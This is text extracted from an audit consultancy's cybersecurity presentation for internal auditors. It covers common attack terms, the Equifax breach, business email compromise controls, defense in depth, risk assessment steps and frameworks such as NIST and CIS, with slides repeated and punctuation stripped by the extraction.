Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
13
ATTACKS IN THE HEADLINES
httpswwwbusinessinsidercomhackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
httpsjsiswashingtonedunewscyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
14
COMMON TERMS AND DEFINITIONSBot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
15
ATTACKS IN THE HEADLINES
httpswwwcsoonlinecomarticle3258748the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internethtml
httpswwwwiredcomstoryreaper-iot-botnet-infected-million-networks
16
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
14
COMMON TERMS AND DEFINITIONSBot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
15
ATTACKS IN THE HEADLINES
httpswwwcsoonlinecomarticle3258748the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internethtml
httpswwwwiredcomstoryreaper-iot-botnet-infected-million-networks
16
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
